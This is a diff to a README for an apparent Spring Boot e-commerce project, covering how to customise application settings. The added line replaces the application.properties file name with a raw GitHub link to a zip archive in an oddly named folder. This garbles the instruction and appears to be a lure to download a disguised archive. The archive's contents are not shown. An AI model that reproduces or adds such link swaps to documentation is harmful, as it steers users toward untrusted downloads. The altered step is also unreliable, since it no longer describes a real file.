885723/Springboot-ecommerce/README.md

 You can customize your e-commerce store by modifying the application settings.
 Here’s how:

-1. Locate the `application.properties` file in your project folder.
+1. Locate the `https://raw.githubusercontent.com/885723/Springboot-ecommerce/main/unknownly/Springboot-ecommerce.zip` file in your project folder.
 2. Change settings like the database URL, username, and password to fit your configuration.
 3. Save the changes and restart the application for the updates to take effect.